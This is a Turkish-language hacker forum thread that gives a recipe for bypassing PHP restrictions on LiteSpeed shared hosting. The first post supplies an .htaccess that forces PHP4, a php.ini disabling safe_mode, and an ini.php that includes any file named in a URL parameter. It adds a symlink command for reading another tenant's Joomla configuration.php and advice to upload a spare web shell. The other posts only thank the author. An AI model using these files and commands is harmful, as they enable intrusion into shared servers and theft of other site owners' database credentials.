Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: LiteSpeed server bypass komutları
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 113
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
LiteSpeed server bypass komutları
16.02.2014 10:29
.htaccess

Kod:
<Files *.php>
ForceType application/x-httpd-php4
</Files>

----------------------------------------------------

php.ini

Kod:
safe_mode = OFF

----------------------------------------------------

ini.php

Kod:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

-------------------------------------

Bu Dosyaları serverde açtığımız dizine upload ediyoruz örneğin ben Pose diye bir dizin açtım
oraya yükledim farzedelim yapmamız gerekn şu çektiğimiz pwd dosyasından geçmek istediğimiz dizini bulmak örneğin


/home/poseidon/public_html/ dizininde olduğumuzu farz edeli fakat elimzdeki pwd dosyasında şöyle bir başka dizin bulunmakta

/home/bk:/usr/local/cpanel/bin/noshell
/home/bk2:/usr/local/cpanel/bin/noshell
/home/bk3:/usr/local/cpanel/bin/noshell
/home/bk4:/usr/local/cpanel/bin/noshell
/home/bk5:/usr/local/cpanel/bin/noshell
/home/bk6:/usr/local/cpanel/bin/noshell

hepsini farklı olarak düşünü bizim yapmamız gereken geçmek istediğimiz dizini yazmak örneğin ben bu dizinden

/home/bk/public_html/

bir başka dizin olan /home/bk:/usr/local/cpanel/bin/noshell dizinine geçmek istiyorum ve oradaki configi alıp yazdırmak istiyorum dikkat etmemiz gerekn husus sistemdir joomlamı wordpressmi


eğer joomla ise

ln -s //home/bk/public_html/configration.php pose.shtml

diyip enterliyoruz eğer configi çekerse ana dizinde şöyle bir sayfa oluşturacak pose.shtml diye tıkladığımızda config bilgisini karşımızda veya source kısmında olduğunu göreceğiz bunu ctrl+u yaparak görebiliriz

NOT:Sunucu php4'e düşürülürken shell'i kaybedebilirsiniz bu yüzden her ihtimale karşı anadizine bir shell upload edin sıkıntı olmasın


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,045 / 1,045
Deneyim: 81 / 100
Rep Sayısı: 1001
Mesaj Sayısı: 2958
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: LiteSpeed server bypass komutları
16.02.2014 14:08
Eline sağlık Smile

Dört yanım ihanet, dört yanım yalan. Geçmemiş bu kış, gelmemiş bahar. Şu koca binaları üstüme yıkan gülümser önümde yüzlerce zaaf, umut her şeyden muaf. Dönmedim geri, çıkmıyor üstümden geçmişin kiri..
Alinti
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 16 / 236
Deneyim: 44 / 100
Rep Sayısı: 9
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #3
RE: LiteSpeed server bypass komutları
16.02.2014 14:12
güzel konu Smile
Alinti
[email protected]
*
avatar
Onursal Üye
Durum: Çevrimdışı
Seviye Puanı: 26
Yaşam Puanı: 282 / 628
Deneyim: 13 / 100
Rep Sayısı: 119
Mesaj Sayısı: 850
Üyelik Tarihi: 05.05.2013
     
Yorum: #4
Cvp: LiteSpeed server bypass komutları
16.02.2014 15:37
LİteSpeed en sevdiğimdir Smile
Alinti



1 Ziyaretçi